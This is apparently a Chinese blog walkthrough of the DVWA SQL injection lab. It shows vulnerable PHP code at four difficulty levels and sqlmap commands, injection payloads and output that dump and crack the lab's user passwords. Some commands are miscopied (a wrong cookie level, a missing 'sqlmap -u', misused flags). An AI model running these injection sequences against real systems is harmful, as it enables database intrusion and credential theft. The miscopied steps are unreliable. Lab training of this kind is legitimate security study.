【DVWA全攻略】使用SQLMAP完成DVWA SQL Injection实验

image.png

DVWA SQL Injection实验

使用SQLMAP完成DVWA SQL注入实验

正常功能

完成输入查看id对应的用户名

image.png

判断SQL注入的类型方法

判断SQL注入是数字型还是字符型

数字型

$id = $_GET['content'];
 select * from users where id=1

字符型

$id = $_GET['content'];
 select * from users where id='admin'

Low难度

代码分析

<?php
 if( isset( $_REQUEST[ 'Submit' ] ) ) {
     // Get input
     $id = $_REQUEST[ 'id' ];
 ​
     // Check database
     $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
     $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
 ​
     // Get results
     while( $row = mysqli_fetch_assoc( $result ) ) {
         // Get values
         $first = $row["first_name"];
         $last  = $row["last_name"];
 ​
         // Feedback for end user
         $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
     }
     mysqli_close($GLOBALS["___mysqli_ston"]);
 ​
 }
 ?>

上述代码未对输入进行过滤,我们输入的内容会传给$id,因此可以考虑在输入上做文章

$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';

查看注入点

由于dvwa默认存在用户名和密码登录的情况,因此这里需要使用--cookie来获取登陆状态,然后在进行扫描,尝试注入漏洞

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37"

可以看到相关的注入情况如下

sqlmap identified the following injection point(s) with a total of 150 HTTP(s) requests:
 ---
 Parameter: id (GET)
     Type: boolean-based blind
     Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
     Payload: id=2' OR NOT 4391=4391#&Submit=Submit
 ​
     Type: error-based
     Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
     Payload: id=2' AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(8715=8715,1))),0x716a6a7871),8715)-- ZTFh&Submit=Submit
 ​
     Type: time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
     Payload: id=2' AND (SELECT 7666 FROM (SELECT(SLEEP(5)))rSxl)-- MbUf&Submit=Submit
 ​
     Type: UNION query
     Title: MySQL UNION query (NULL) - 2 columns
     Payload: id=2' UNION ALL SELECT NULL,CONCAT(0x717a6a7171,0x6359625a4c596e436c4e65415a5869486d727048546d4748475467474b7355467a4b4f4946556979,0x716a6a7871)#&Submit=Submit

查询数据库

查询数据库都有哪些

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --dbs

发现相关的数据库如下

[11:28:06] [INFO] fetching database names
 [11:28:06] [WARNING] reflective value(s) found and filtering out
 available databases [3]:
 [*] dvwa
 [*] information_schema
 [*] test

查看数据表

查看数据库dvwa下的表名

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa --tables

可以看到guestbook、users两张表

[11:43:31] [INFO] fetching tables for database: 'dvwa'
 [11:43:31] [WARNING] reflective value(s) found and filtering out
 Database: dvwa
 [2 tables]
 +-----------+
 | guestbook |
 | users     |
 +-----------+

查看数据表的列

查看user数据表下的列

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa -T users --columns

可以看到每列的字段名称以及对应的数据类型

[13:37:44] [WARNING] reflective value(s) found and filtering out
 Database: dvwa
 Table: users
 [8 columns]
 +--------------+-------------+
 | Column       | Type        |
 +--------------+-------------+
 | user         | varchar(15) |
 | avatar       | varchar(70) |
 | failed_login | int(3)      |
 | first_name   | varchar(15) |
 | last_login   | timestamp   |
 | last_name    | varchar(15) |
 | password     | varchar(32) |
 | user_id      | int(6)      |
 +--------------+-------------+

查看数据表中某个字段的具体值

查看dvwa数据库下users表中usernamepassword字段值

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa -T users --columns user,password -dump

可以自动解出简单的md5值,用这种方法很方便就能找到用户密码,就不需要在线md5解密了

do you want to use common password suffixes? (slow!) [y/N] 
 [13:47:22] [INFO] starting dictionary-based cracking (md5_generic_passwd)
 [13:47:22] [INFO] starting 8 processes 
 [13:47:23] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'                                                  
 [13:47:24] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'                                                 
 [13:47:26] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'                                                 
 [13:47:27] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'                                                
 Database: dvwa                                                                                                                           
 Table: users
 [5 entries]
 +---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
 | user_id | user    | avatar                           | password                                    | last_name | first_name | last_login          | failed_login |
 +---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
 | 1       | admin   | /dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2021-03-30 11:26:47 | 0            |
 | 2       | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2021-03-30 11:26:47 | 0            |
 | 3       | 1337    | /dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2021-03-30 11:26:47 | 0            |
 | 4       | pablo   | /dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2021-03-30 11:26:47 | 0            |
 | 5       | smithy  | /dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2021-03-30 11:26:47 | 0            |
 +---------+---------+----------------------------------+---------------------------------------------

Medium难度

代码分析

<?php
 ​
 if( isset( $_POST[ 'Submit' ] ) ) {
 ​
     // Get input
     $id = $_POST[ 'id' ];
     $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
     $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
     $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
 ​
     // Get results
     while( $row = mysqli_fetch_assoc( $result ) ) {
         // Display values
         $first = $row["first_name"];
         $last  = $row["last_name"];
 ​
         // Feedback for end user
         $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
     }
 ​
 }
 ​
 // This is used later on in the index.php page
 // Setting it here so we can close the database connection in here like in the rest of the source scripts
 $query  = "SELECT COUNT(*) FROM users;";
 $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
 ​
 $number_of_rows = mysqli_fetch_row( $result )[0];
 mysqli_close($GLOBALS["___mysqli_ston"]);
 ?>

上述代码使用mysql_real_escape_string函数对输入的特殊字符进行了转义,同时在前端页面使用了下拉列表,将之前的get请求更改为post请求

实验过程

image.png

查看注入点

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit"

可以发现存在不同类型的注入点

[17:12:26] [INFO] POST parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
 POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
 ---
 Parameter: id (POST)
     Type: boolean-based blind
     Title: Boolean-based blind - Parameter replace (original value)
     Payload: id=(SELECT (CASE WHEN (8328=8328) THEN 2 ELSE (SELECT 4432 UNION SELECT 9630) END))&Submit=Submit
 ​
     Type: error-based
     Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
     Payload: id=2 AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(1202=1202,1))),0x716a6a7871),1202)&Submit=Submit
 ​
     Type: time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
     Payload: id=2 AND (SELECT 2862 FROM (SELECT(SLEEP(5)))gLnf)&Submit=Submit
 ​
     Type: UNION query
     Title: Generic UNION query (NULL) - 2 columns
     Payload: id=2 UNION ALL SELECT CONCAT(0x717a6a7171,0x55506e6a56597642546f5571454645716847774e5158616e557766706342496b4a7a676f45486173,0x716a6a7871),NULL-- -&Submit=Submit
 ---

查看数据库

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" -dbs

可以看到爆出的数据库有dvwainformation_schematest

[17:14:43] [INFO] fetching database names
 available databases [3]:
 [*] dvwa
 [*] information_schema
 [*] test

查看数据表

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --tables -D "dvwa"

可以看到爆出的数据表guestbookusers

[17:24:40] [INFO] fetching tables for database: 'dvwa'
 Database: dvwa
 [2 tables]
 +-----------+
 | guestbook |
 | users     |
 +-----------+

查看数据表的列

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users"

可以看到users表中的列

[17:34:08] [INFO] fetching columns for table 'users' in database 'dvwa'
 Database: dvwa
 Table: users
 [8 columns]
 +--------------+-------------+
 | Column       | Type        |
 +--------------+-------------+
 | user         | varchar(15) |
 | avatar       | varchar(70) |
 | failed_login | int(3)      |
 | first_name   | varchar(15) |
 | last_login   | timestamp   |
 | last_name    | varchar(15) |
 | password     | varchar(32) |
 | user_id      | int(6)      |
 +--------------+-------------+

查看数据表中某个字段的具体值

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users" user,password -dump

查看表中userpassword的值

[17:35:25] [INFO] fetching columns for table 'users' in database 'dvwa'
 [17:35:25] [INFO] fetching entries for table 'users' in database 'dvwa'
 [17:35:25] [INFO] recognized possible password hashes in column 'password'
 do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] \
 do you want to crack them via a dictionary-based attack? [Y/n/q] 
 [17:35:29] [INFO] using hash method 'md5_generic_passwd'
 [17:35:29] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
 [17:35:29] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
 [17:35:29] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
 [17:35:29] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
 Database: dvwa
 Table: users
 [5 entries]
 +---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
 | user_id | user    | avatar                           | password                                    | last_name | first_name | last_login          | failed_login |
 +---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
 | 1       | admin   | /dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2021-03-30 11:26:47 | 0            |
 | 2       | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2021-03-30 11:26:47 | 0            |
 | 3       | 1337    | /dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2021-03-30 11:26:47 | 0            |
 | 4       | pablo   | /dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2021-03-30 11:26:47 | 0            |
 | 5       | smithy  | /dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2021-03-30 11:26:47 | 0            |
 +---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+

High难度

代码分析

<?php
 ​
 if( isset( $_SESSION [ 'id' ] ) ) {
     // Get input
     $id = $_SESSION[ 'id' ];
 ​
     // Check database
     $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
     $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
 ​
     // Get results
     while( $row = mysqli_fetch_assoc( $result ) ) {
         // Get values
         $first = $row["first_name"];
         $last  = $row["last_name"];
         // Feedback for end user
         $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
     }
     ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
 }
 ?>

High难度的页面变成了单独的session-input.php入口提交内容,然后再传到原来的页面,可以一定程度上防止一般的sqlmap注入,不过sqlmap还是很强大的,可以通过提升level来解决这个问题。

查看注入点

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --level=2

可以发现存在不同类型的注入点

sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: id (POST)
     Type: boolean-based blind
     Title: Boolean-based blind - Parameter replace (original value)
     Payload: id=(SELECT (CASE WHEN (8328=8328) THEN 2 ELSE (SELECT 4432 UNION SELECT 9630) END))&Submit=Submit
 ​
     Type: error-based
     Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
     Payload: id=2 AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(1202=1202,1))),0x716a6a7871),1202)&Submit=Submit
 ​
     Type: time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
     Payload: id=2 AND (SELECT 2862 FROM (SELECT(SLEEP(5)))gLnf)&Submit=Submit
 ​
     Type: UNION query
     Title: Generic UNION query (NULL) - 2 columns
     Payload: id=2 UNION ALL SELECT CONCAT(0x717a6a7171,0x55506e6a56597642546f5571454645716847774e5158616e557766706342496b4a7a676f45486173,0x716a6a7871),NULL-- -&Submit=Submit
 ---
 ​

查看数据库

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" -dbs

可以看到爆出的数据库有dvwainformation_schematest

[17:14:43] [INFO] fetching database names
 available databases [3]:
 [*] dvwa
 [*] information_schema
 [*] test

查看数据表

http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --level=2 -dbs

可以看到爆出的数据表guestbookusers

[21:50:18] [INFO] fetching database names
 available databases [3]:
 [*] dvwa
 [*] information_schema
 [*] test

查看数据表的列

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users" --level=2

可以看到users表中的列

[21:51:52] [INFO] fetching columns for table 'users' in database 'dvwa'
 Database: dvwa
 Table: users
 [8 columns]
 +--------------+-------------+
 | Column       | Type        |
 +--------------+-------------+
 | user         | varchar(15) |
 | avatar       | varchar(70) |
 | failed_login | int(3)      |
 | first_name   | varchar(15) |
 | last_login   | timestamp   |
 | last_name    | varchar(15) |
 | password     | varchar(32) |
 | user_id      | int(6)      |
 +--------------+-------------+

查看数据表中某个字段的具体值

sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users" user,password -dump  --level=2

查看表中userpassword的值

Database: dvwa
 Table: users
 [5 entries]
 +---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
 | user_id | user    | avatar                           | password                                    | last_name | first_name | last_login          | failed_login |
 +---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
 | 1       | admin   | /dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2021-03-30 11:26:47 | 0            |
 | 2       | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2021-03-30 11:26:47 | 0            |
 | 3       | 1337    | /dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2021-03-30 11:26:47 | 0            |
 | 4       | pablo   | /dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2021-03-30 11:26:47 | 0            |
 | 5       | smithy  | /dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2021-03-30 11:26:47 | 0            |
 +---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+

Impossible难度

代码分析

<?php
 if( isset( $_GET[ 'Submit' ] ) ) {
     // Check Anti-CSRF token
     checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
 ​
     // Get input
     $id = $_GET[ 'id' ];
 ​
     // Was a number entered?
     if(is_numeric( $id )) {
         // Check the database
         $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
         $data->bindParam( ':id', $id, PDO::PARAM_INT );
         $data->execute();
         $row = $data->fetch();
 ​
         // Make sure only 1 result is returned
 ​
         if( $data->rowCount() == 1 ) {
             // Get values
             $first = $row[ 'first_name' ];
             $last  = $row[ 'last_name' ];
 ​
             // Feedback for end user
             $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
         }
     }
 }
 ​
 // Generate Anti-CSRF token
 generateSessionToken();
 ?>

上述代码继续延续PDO技术,同时采用user-token验证的方式,防止CSRF攻击。

© 版权声明
THE END
喜欢就支持一下吧
点赞373赞赏
分享
评论 共3条

请登录后发表评论

    • FancyPig的头像-FancyPig's blog
      猪猪侠
      0
      • FancyPig的头像-FancyPig's blog
        Pig8作者
        0